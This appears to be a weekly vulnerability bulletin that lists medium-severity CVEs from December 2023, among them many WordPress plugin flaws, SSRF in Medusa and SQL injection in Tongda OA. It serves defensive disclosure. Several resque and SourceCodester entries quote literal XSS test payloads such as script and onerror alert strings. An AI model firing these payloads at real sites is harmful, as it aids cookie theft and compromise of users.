phpgurukul -- online_notes_sharing_systemA vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739.2023-12-224.3CVE-2023-7052
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpgurukul -- online_notes_sharing_systemA vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability.2023-12-224.3CVE-2023-7055
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
phpmyfaq -- phpmyfaqCross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.2023-12-165.4CVE-2023-6889
security@huntr.dev
security@huntr.dev
phpmyfaq -- phpmyfaqCross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.2023-12-165.4CVE-2023-6890
security@huntr.dev
security@huntr.dev
progress_software_corporation -- sitefinityA malicious user could potentially use the Sitefinity system for the distribution of phishing emails.2023-12-204.7CVE-2023-6784
security@progress.com
security@progress.com
pymedusa -- medusaMedusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testDiscord` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `discord_webhook` variable and passes it to the `notifiers.discord_notifier.test_notify` method, then `_notify_discord` and finally `_send_discord_msg` method, which sends a POST request to the user-controlled URL on line 64 in `/medusa/notifiers/discord.py`, which leads to a blind server-side request forgery. This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.2023-12-225.3CVE-2023-50258
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
pymedusa -- medusaMedusa is an automatic video library manager for TV shows. Versions prior to 1.0.19 are vulnerable to unauthenticated blind server-side request forgery (SSRF). The `testslack` request handler in `medusa/server/web/home/handler.py` does not validate the user-controlled `slack_webhook` variable and passes it to the `notifiers.slack_notifier.test_notify` method, then `_notify_slack` and finally `_send_slack` method, which sends a POST request to the user-controlled URL on line 103 in `/medusa/notifiers/slack.py`, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting POST requests on behalf of the Medusa server. Version 1.0.19 contains a fix for the issue.2023-12-225.3CVE-2023-50259
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
redhat -- keycloakA flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt" which could be used to bypass the security patch implemented to address CVE-2023-6134.2023-12-186.1CVE-2023-6927
secalert@redhat.com
secalert@redhat.com
resque -- resqueResque (pronounced like "rescue") is a Redis-backed library for creating background jobs, placing those jobs on multiple queues, and processing them later. resque-web in resque versions before 2.1.0 are vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint. This issue has been patched in version 2.1.0.2023-12-216.3CVE-2023-50724
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
resque -- resqueResque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. The following paths in resque-web have been found to be vulnerable to reflected XSS: "/failed/?class=<script>alert(document.cookie)</script>" and "/queues/><img src=a onerror=alert(document.cookie)>". This issue has been patched in version 2.2.1.2023-12-226.3CVE-2023-50725
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
resque -- resqueResque is a Redis-backed Ruby library for creating background jobs, placing them on multiple queues, and processing them later. Reflected XSS issue occurs when /queues is appended with /"><svg%20onload=alert(domain)>. This issue has been patched in version 2.6.0.2023-12-226.3CVE-2023-50727
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
satellite -- satelliteAn arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.2023-12-186CVE-2023-4320
secalert@redhat.com
secalert@redhat.com
silabs -- z-wave_software_development_kitA denial of service vulnerability exists in all Silicon Labs Z-Wave controller and endpoint devices running Z-Wave SDK v7.20.3 (Gecko SDK v4.3.3) and earlier. This attack can be carried out only by devices on the network sending a stream of packets to the device.2023-12-156.5CVE-2023-5310
product-security@silabs.com
product-security@silabs.com
silicon_labs -- gsdkAn Observable Timing Discrepancy, Covert Timing Channel vulnerability in Silabs GSDK on ARM potentially allows Padding Oracle Crypto Attack on CBC PKCS7. This issue affects GSDK: through 4.4.0.2023-12-214.6CVE-2023-41097
product-security@silabs.com
product-security@silabs.com
skupper_operator -- skupper_operatorA flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user's purview.2023-12-186.8CVE-2023-5056
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
snowflakedb -- snowflake-connector-netThe Snowflake .NET driver provides an interface to the Microsoft .NET open source software framework for developing applications. Snowflake recently received a report about a vulnerability in the Snowflake Connector .NET where the checks against the Certificate Revocation List (CRL) were not performed where the insecureMode flag was set to false, which is the default setting. The vulnerability affects versions between 2.0.25 and 2.1.4 (inclusive). Snowflake fixed the issue in version 2.1.5.2023-12-226CVE-2023-51662
security-advisories@github.com
security-advisories@github.com
softnext -- mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.2023-12-156.5CVE-2023-48381
twcert@cert.org.tw
softnext -- mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information but does not affect service availability.2023-12-156.5CVE-2023-48382
twcert@cert.org.tw
softnext -- mail_sqr_expertSoftnext Mail SQR Expert is an email management platform, it has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response.2023-12-155.3CVE-2023-48379
twcert@cert.org.tw
sourcecodester -- simple_image_stack_websiteA vulnerability was found in SourceCodester Simple Image Stack Website 1.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument search with the input sy2ap%22%3e%3cscript%3ealert(1)%3c%2fscript%3etkxh1 leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248255.2023-12-176.1CVE-2023-6896
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester -- simple_student_attendance_systemA vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality. The manipulation of the argument page leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248749 was assigned to this vulnerability.2023-12-226.3CVE-2023-7058
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sudo -- sudoA flaw was found in sudo in the handling of ipa_hostname, where ipa_hostname from /etc/sssd/sssd.conf was not propagated in sudo. Therefore, it leads to privilege mismanagement vulnerability in applications, where client hosts retain privileges even after retracting them.2023-12-236.6CVE-2023-7090
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
systemd-resolved -- systemd-resolvedA vulnerability was found in systemd-resolved. This issue may allow systemd-resolved to accept records of DNSSEC-signed domains even when they have no signature, allowing man-in-the-middles (or the upstream DNS resolver) to manipulate records.2023-12-235.9CVE-2023-7008
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
taiwan-ca -- jcicsecuritytoolTAIWAN-CA(TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform XSS (Stored Cross-Site Scripting) attack.2023-12-156.1CVE-2023-48387
twcert@cert.org.tw
tcpreplay -- tcpreplayWithin tcpreplay's tcprewrite, a double free vulnerability has been identified in the tcpedit_dlt_cleanup() function within plugins/dlt_plugins.c. This vulnerability can be exploited by supplying a specifically crafted file to the tcprewrite binary. This flaw enables a local attacker to initiate a Denial of Service (DoS) attack.2023-12-215.5CVE-2023-4256
secalert@redhat.com
secalert@redhat.com
tongda -- tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7020
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda -- tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been classified as critical. Affected is an unknown function of the file general/vehicle/checkup/delete_search.php. The manipulation of the argument VU_ID leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7021
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda -- tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/work_plan/manage/delete_all.php. The manipulation of the argument DELETE_STR leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7022
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tongda -- tongda_office_anywhereA vulnerability was found in Tongda OA 2017 up to 11.9. It has been rated as critical. Affected by this issue is some unknown functionality of the file general/vehicle/query/delete.php. The manipulation of the argument VU_ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-248570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7023
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
uffizio -- gps_trackerAn Open Redirection vulnerability exists in Uffizio's GPS Tracker all versions allows an attacker to construct a URL within the application that causes a redirection to an arbitrary external domain.2023-12-166.1CVE-2020-17484
cve@mitre.org
cve@mitre.org
uyumsoft -- lioxerpImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Reflected XSS. This issue affects LioXERP: before v.146.2023-12-216.1CVE-2023-5988
iletisim@usom.gov.tr
uyumsoft -- lioxerpImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Uyumsoft Information System and Technologies LioXERP allows Stored XSS. This issue affects LioXERP: before v.146.2023-12-215.4CVE-2023-5989
iletisim@usom.gov.tr
w3m -- w3mAn out-of-bounds write issue has been discovered in the backspace handling of the checkType() function in etc.c within the W3M application. This vulnerability is triggered by supplying a specially crafted HTML file to the w3m binary. Exploitation of this flaw could lead to application crashes, resulting in a denial of service condition.2023-12-215.5CVE-2023-4255
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
wordpress -- wordpressServer-Side Request Forgery (SSRF) vulnerability in GiveWP GiveWP - Donation Plugin and Fundraising Platform. This issue affects GiveWP - Donation Plugin and Fundraising Platform: from n/a through 2.25.1.2023-12-186.5CVE-2022-40312
audit@patchstack.com
wordpress -- wordpressUnrestricted Upload of File with Dangerous Type vulnerability in Glen Don L. Mongaya Drag and Drop Multiple File Upload for WooCommerce. This issue affects Drag and Drop Multiple File Upload for WooCommerce: from n/a through 1.0.8.2023-12-216.5CVE-2022-45377
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE. This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.2023-12-206.7CVE-2023-28491
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce Shipping Multiple Addresses. This issue affects Shipping Multiple Addresses: from n/a through 3.8.3.2023-12-216.5CVE-2023-32799
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in Magazine3 Core Web Vitals & PageSpeed Booster. This issue affects Core Web Vitals & PageSpeed Booster: from n/a through 1.0.12.2023-12-196.1CVE-2023-35883
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms. This issue affects Integration for Salesforce and Contact Form 7, WPForms, Elementor, Ninja Forms: from n/a through 1.3.3.2023-12-196.1CVE-2023-37982
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and QuickBooks. This issue affects Integration for WooCommerce and QuickBooks: from n/a through 1.2.3.2023-12-196.1CVE-2023-38478
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin. This issue affects Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin: from n/a before 1.3.7.2023-12-196.1CVE-2023-38481
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in Doofinder Doofinder WP & WooCommerce Search. This issue affects Doofinder WP & WooCommerce Search: from n/a through 1.5.49.2023-12-196.1CVE-2023-40602
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in Swapnil V. Patil Login and Logout Redirect. This issue affects Login and Logout Redirect: from n/a through 2.0.3.2023-12-196.1CVE-2023-41648
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Media File Renamer: Rename Files (Manual, Auto & AI). This issue affects Media File Renamer: Rename Files (Manual, Auto & AI): from n/a through 5.6.9.2023-12-196.5CVE-2023-44991
audit@patchstack.com
wordpress -- wordpressURL Redirection to Untrusted Site ('Open Redirect') vulnerability in SERVIT Software Solutions affiliate-toolkit - WordPress Affiliate Plugin. This issue affects affiliate-toolkit - WordPress Affiliate Plugin: from n/a through 3.3.9.2023-12-196.1CVE-2023-45105
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in KaineLabs Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress. This issue affects Youzify - BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress: from n/a through 1.2.2.2023-12-216.5CVE-2023-47191
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mahlamusa Who Hit The Page - Hit Counter allows SQL Injection. This issue affects Who Hit The Page - Hit Counter: from n/a through 1.4.14.3.2023-12-186.5CVE-2023-47558
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm - Form Builder for WordPress allows Reflected XSS. his issue affects Forms by CaptainForm - Form Builder for WordPress: from n/a through 2.5.3.2023-12-156.1CVE-2023-49170
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2.2023-12-156.1CVE-2023-49176
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0.2023-12-156.1CVE-2023-49177
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.2023-12-156.1CVE-2023-49178
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.2023-12-156.1CVE-2023-49182
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.2023-12-156.1CVE-2023-49183
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.2023-12-156.1CVE-2023-49185
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.2023-12-156.1CVE-2023-49187
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8.2023-12-196.1CVE-2023-50376
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Currency.Wiki Currency Converter Widget - Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget - Exchange Rates: from n/a through 3.0.2.2023-12-216.5CVE-2023-50822
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7.2023-12-216.5CVE-2023-50823
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021.2023-12-216.5CVE-2023-50824
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0.2023-12-216.5CVE-2023-50825
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VillaTheme CURCY - Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY - Multi Currency for WooCommerce: from n/a through 2.2.0.2023-12-216.5CVE-2023-50831
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239.2023-12-216.5CVE-2023-50833
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2.2023-12-216.5CVE-2023-50834
audit@patchstack.com
wordpress -- wordpressThe Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.2023-12-186.1CVE-2023-5348
contact@wpscan.com
wordpress -- wordpressThe Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected2023-12-186.5CVE-2023-6077
contact@wpscan.com
wordpress -- wordpressThe Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'et_pb_text' shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.2023-12-236.4CVE-2023-6744
security@wordfence.com
security@wordfence.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker - Popup for opt-ins, lead gen, & more. This issue affects Popup Maker - Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.2023-12-205.3CVE-2022-47597
audit@patchstack.com
wordpress -- wordpressDeserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.2023-12-205.5CVE-2022-47599
audit@patchstack.com
wordpress -- wordpressMissing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2.2023-12-215.4CVE-2023-22674
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1.2023-12-215.9CVE-2023-2487
audit@patchstack.com
wordpress -- wordpressMissing Authorization vulnerability in GamiPress GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6.2023-12-195.4CVE-2023-25715
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin - WP Email Capture. This issue affects WordPress Email Marketing Plugin - WP Email Capture: from n/a through 3.10.2023-12-215.3CVE-2023-28421
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78.2023-12-215.4CVE-2023-32747
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12.2023-12-205.4CVE-2023-36520
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5.2023-12-205.4CVE-2023-38513
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0.2023-12-205.3CVE-2023-41796
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5.2023-12-195.3CVE-2023-44982
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6.2023-12-195.3CVE-2023-44983
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Event Monster - Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster - Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2.2023-12-215.9CVE-2023-47525
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5.2023-12-215.9CVE-2023-47527
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22.2023-12-155.4CVE-2023-48765
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5.2023-12-185.4CVE-2023-49148
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6.2023-12-155.4CVE-2023-49160
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6.2023-12-215.3CVE-2023-49162
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1.2023-12-155.4CVE-2023-49165
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.2023-12-155.4CVE-2023-49169
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5.2023-12-155.4CVE-2023-49174
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1.2023-12-155.4CVE-2023-49175
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6.2023-12-155.4CVE-2023-49179
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40.2023-12-155.4CVE-2023-49181
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4.2023-12-155.4CVE-2023-49184
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3.2023-12-155.4CVE-2023-49747
audit@patchstack.com
wordpress -- wordpressExposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite - Create an app with the Best Mobile App Builder. This issue affects AppMySite - Create an app with the Best Mobile App Builder: from n/a through 3.11.0.2023-12-215.3CVE-2023-49762
audit@patchstack.com
wordpress -- wordpressAuthorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005.2023-12-195.3CVE-2023-49812
audit@patchstack.com
wordpress -- wordpressCross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat - WP live chat plugin for WordPress. This issue affects LiveChat - WP live chat plugin for WordPress: from n/a through 4.5.15.2023-12-185.4CVE-2023-49821
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1.2023-12-155.4CVE-2023-49823
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2.2023-12-215.9CVE-2023-50377
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10.2023-12-215.9CVE-2023-50826
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8.2023-12-215.9CVE-2023-50827
audit@patchstack.com
wordpress -- wordpressImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard - Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard - Custom WordPress Dashboard: from n/a through 3.7.11.2023-12-215.9CVE-2023-50828
audit@patchstack.com
